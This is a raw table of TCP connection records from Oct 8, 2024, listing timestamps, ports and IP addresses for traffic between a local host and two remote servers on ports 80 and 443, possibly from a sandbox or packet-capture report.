Oct 8, 2024 20:47:25.604001999 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.604054928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.604088068 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.604104042 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.604127884 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.604139090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.604172945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.604208946 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.604216099 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.604240894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.604253054 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.604278088 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.604285955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.604310989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.604322910 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.604345083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.604378939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.604387999 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.604417086 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.604424000 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.604460955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.679400921 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.684578896 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.708537102 CEST	443	49792	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.708914042 CEST	49792	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.708928108 CEST	443	49792	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.709306955 CEST	49792	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.709311008 CEST	443	49792	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.810738087 CEST	443	49792	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.810883045 CEST	443	49792	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.810940981 CEST	49792	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.811161995 CEST	49792	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.811173916 CEST	443	49792	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.811182976 CEST	49792	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.811187029 CEST	443	49792	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.813589096 CEST	49797	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.813678980 CEST	443	49797	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.814161062 CEST	49797	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.814306974 CEST	49797	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.814328909 CEST	443	49797	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.894902945 CEST	443	49793	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.895311117 CEST	49793	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.895351887 CEST	443	49793	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.895685911 CEST	49793	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.895699024 CEST	443	49793	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.948482037 CEST	443	49794	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.949512005 CEST	49794	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.949552059 CEST	443	49794	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.949855089 CEST	49794	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.949865103 CEST	443	49794	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.993110895 CEST	443	49793	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.993256092 CEST	443	49793	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.993346930 CEST	49793	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.993396044 CEST	49793	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.993396997 CEST	49793	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.993429899 CEST	443	49793	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.993451118 CEST	443	49793	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.995634079 CEST	49798	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.995687008 CEST	443	49798	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.995776892 CEST	49798	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.995902061 CEST	49798	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.995913982 CEST	443	49798	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.002964973 CEST	443	49795	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.003531933 CEST	49795	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.003542900 CEST	443	49795	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.003891945 CEST	49795	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.003901958 CEST	443	49795	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.052889109 CEST	443	49794	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.052953959 CEST	443	49794	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.053184986 CEST	49794	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.053268909 CEST	49794	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.053268909 CEST	49794	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.053311110 CEST	443	49794	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.053344965 CEST	443	49794	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.055510998 CEST	49799	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.055608034 CEST	443	49799	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.055792093 CEST	49799	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.055989027 CEST	49799	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.056011915 CEST	443	49799	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.107322931 CEST	443	49795	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.107553005 CEST	443	49795	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.107624054 CEST	49795	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.107644081 CEST	49795	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.107651949 CEST	443	49795	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.107686996 CEST	49795	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.107691050 CEST	443	49795	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.109863997 CEST	49800	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.109922886 CEST	443	49800	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.110021114 CEST	49800	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.110135078 CEST	49800	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.110162973 CEST	443	49800	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.265099049 CEST	443	49796	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.265532017 CEST	49796	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.265594006 CEST	443	49796	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.265908957 CEST	49796	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.265923023 CEST	443	49796	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.392107010 CEST	443	49796	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.392291069 CEST	443	49796	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.392417908 CEST	49796	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.392477989 CEST	49796	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.392477989 CEST	49796	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.392503023 CEST	443	49796	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.392518044 CEST	443	49796	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.395209074 CEST	49801	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.395256996 CEST	443	49801	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.395349026 CEST	49801	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.395500898 CEST	49801	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.395512104 CEST	443	49801	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.482155085 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:26.482537031 CEST	443	49797	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.482628107 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:26.483916998 CEST	49797	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.483958960 CEST	443	49797	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.484333038 CEST	49797	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.484342098 CEST	443	49797	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.582616091 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:26.587496996 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:26.602855921 CEST	443	49797	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.603024006 CEST	443	49797	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.603111029 CEST	49797	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.603243113 CEST	49797	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.603266954 CEST	443	49797	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.603281021 CEST	49797	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.603288889 CEST	443	49797	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.605881929 CEST	49802	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.605969906 CEST	443	49802	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.606054068 CEST	49802	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.606208086 CEST	49802	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.606230021 CEST	443	49802	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.707313061 CEST	443	49798	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.711568117 CEST	49798	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.711625099 CEST	443	49798	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.712033033 CEST	49798	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.712048054 CEST	443	49798	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.743030071 CEST	443	49799	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.743531942 CEST	49799	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.743590117 CEST	443	49799	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.743957996 CEST	49799	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.743972063 CEST	443	49799	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.808993101 CEST	443	49800	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.809597969 CEST	49800	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.809659004 CEST	443	49800	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.810017109 CEST	49800	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.810030937 CEST	443	49800	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.840361118 CEST	443	49798	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.840503931 CEST	443	49798	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.840756893 CEST	49798	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.840821028 CEST	49798	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.840821028 CEST	49798	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.840862036 CEST	443	49798	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.840886116 CEST	443	49798	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.843646049 CEST	49803	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.843709946 CEST	443	49803	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.843790054 CEST	49803	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.843929052 CEST	49803	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.843949080 CEST	443	49803	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.891812086 CEST	443	49799	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.891891003 CEST	443	49799	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.891998053 CEST	49799	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.892189980 CEST	49799	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.892235041 CEST	443	49799	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.892285109 CEST	49799	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.892302990 CEST	443	49799	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.894669056 CEST	49804	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.894750118 CEST	443	49804	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.895258904 CEST	49804	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.895380020 CEST	49804	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.895418882 CEST	443	49804	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.923077106 CEST	443	49800	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.923234940 CEST	443	49800	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.923333883 CEST	49800	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.923449039 CEST	49800	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.923449039 CEST	49800	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.923495054 CEST	443	49800	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.923527956 CEST	443	49800	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.925573111 CEST	49805	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.925611019 CEST	443	49805	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:26.925693989 CEST	49805	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.925831079 CEST	49805	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:26.925848961 CEST	443	49805	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.102767944 CEST	443	49801	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.103585005 CEST	49801	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.103616953 CEST	443	49801	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.103987932 CEST	49801	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.103993893 CEST	443	49801	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.352966070 CEST	443	49802	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.353616953 CEST	49802	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.353646994 CEST	443	49802	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.354063034 CEST	49802	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.354068995 CEST	443	49802	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.389718056 CEST	443	49801	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.389786005 CEST	443	49801	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.389868021 CEST	49801	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.389967918 CEST	49801	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.389987946 CEST	443	49801	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.390019894 CEST	49801	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.390029907 CEST	443	49801	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.392416954 CEST	49806	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.392452002 CEST	443	49806	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.392513037 CEST	49806	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.392637968 CEST	49806	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.392654896 CEST	443	49806	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.425154924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:27.425225019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:27.486639023 CEST	443	49802	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.486799002 CEST	443	49802	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.486852884 CEST	49802	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.486939907 CEST	49802	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.486948013 CEST	443	49802	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.486960888 CEST	49802	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.486965895 CEST	443	49802	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.490005016 CEST	49807	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.490050077 CEST	443	49807	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.490118980 CEST	49807	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.491261005 CEST	49807	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.491280079 CEST	443	49807	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.534775972 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:27.539922953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:27.569308043 CEST	443	49804	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.569716930 CEST	49804	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.569730997 CEST	443	49804	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.570157051 CEST	49804	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.570163012 CEST	443	49804	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.626975060 CEST	443	49803	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.627712011 CEST	49803	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.627749920 CEST	443	49803	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.628379107 CEST	49803	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.628386021 CEST	443	49803	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.694659948 CEST	443	49805	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.694992065 CEST	49805	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.695000887 CEST	443	49805	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.695374966 CEST	49805	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.695378065 CEST	443	49805	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.695811987 CEST	443	49804	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.695898056 CEST	443	49804	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.695943117 CEST	49804	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.696002007 CEST	49804	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.696013927 CEST	443	49804	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.696027040 CEST	49804	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.696033001 CEST	443	49804	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.698596954 CEST	49808	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.698681116 CEST	443	49808	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.698796034 CEST	49808	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.698920012 CEST	49808	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.698942900 CEST	443	49808	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.743546009 CEST	443	49803	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.743590117 CEST	443	49803	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.743659973 CEST	49803	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.743721008 CEST	443	49803	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.743756056 CEST	443	49803	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.743813038 CEST	49803	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.743936062 CEST	49803	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.743969917 CEST	443	49803	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.743995905 CEST	49803	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.744009972 CEST	443	49803	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.746704102 CEST	49809	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.746804953 CEST	443	49809	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.746913910 CEST	49809	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.747028112 CEST	49809	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.747054100 CEST	443	49809	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.818222046 CEST	443	49805	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.818363905 CEST	443	49805	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.818425894 CEST	49805	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.818514109 CEST	49805	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.818531036 CEST	443	49805	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.818542004 CEST	49805	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.818547010 CEST	443	49805	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.821007013 CEST	49810	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.821039915 CEST	443	49810	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:27.821125984 CEST	49810	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.821281910 CEST	49810	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:27.821311951 CEST	443	49810	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.119565964 CEST	443	49806	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.120305061 CEST	49806	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.120326996 CEST	443	49806	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.120579004 CEST	49806	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.120584011 CEST	443	49806	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.218369961 CEST	443	49807	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.218823910 CEST	49807	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.218869925 CEST	443	49807	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.219274998 CEST	49807	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.219283104 CEST	443	49807	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.259202957 CEST	443	49806	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.259255886 CEST	443	49806	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.259305000 CEST	49806	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.259320974 CEST	443	49806	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.259411097 CEST	443	49806	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.259460926 CEST	49806	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.259531975 CEST	49806	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.259546041 CEST	443	49806	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.259555101 CEST	49806	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.259561062 CEST	443	49806	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.261960983 CEST	49811	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.262049913 CEST	443	49811	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.262124062 CEST	49811	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.262237072 CEST	49811	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.262254953 CEST	443	49811	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.330713034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.330938101 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.347060919 CEST	443	49807	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.347117901 CEST	443	49807	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.347210884 CEST	49807	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.347248077 CEST	443	49807	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.347302914 CEST	49807	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.347445011 CEST	49807	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.347486973 CEST	443	49807	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.347515106 CEST	49807	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.347528934 CEST	443	49807	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.349955082 CEST	49812	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.350045919 CEST	443	49812	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.350142956 CEST	49812	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.350285053 CEST	49812	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.350322008 CEST	443	49812	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.442285061 CEST	443	49808	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.442780972 CEST	49808	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.442816019 CEST	443	49808	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.443079948 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:28.443231106 CEST	49808	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.443244934 CEST	443	49808	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.447990894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:28.548108101 CEST	443	49810	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.548830032 CEST	49810	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.548894882 CEST	443	49810	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.549176931 CEST	49810	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.549194098 CEST	443	49810	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.552160978 CEST	443	49808	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.552181959 CEST	443	49808	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.552244902 CEST	443	49808	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.552251101 CEST	49808	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.552288055 CEST	49808	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.552503109 CEST	49808	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:28.552536964 CEST	443	49808	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:28.552565098 CEST	49808	443	192.168.2.5	13.107.246.60
